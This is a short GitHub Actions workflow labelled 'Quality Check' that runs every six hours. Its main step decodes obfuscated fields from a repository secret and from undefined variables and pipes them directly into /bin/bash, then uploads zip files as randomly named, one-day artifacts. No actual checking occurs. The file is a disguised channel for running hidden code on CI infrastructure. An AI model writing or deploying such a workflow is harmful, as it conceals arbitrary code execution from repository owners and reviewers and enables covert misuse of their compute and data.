name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '15 0,6,12,18 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          gtazr5: ${{ secrets.gtazr5 }}
        run: |
          printf '%s' "$gtazr5" | jq -r .jder0595 | /bin/bash
          echo $jcb79 | jq -r .bdqba09685 | /bin/bash
          echo $kah3667 | jq -r .b08 | /bin/bash
          echo $dmqis9865 | jq -r .vyorb89633 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: uytJZkzt
          path: "*.zip"
          retention-days: 1
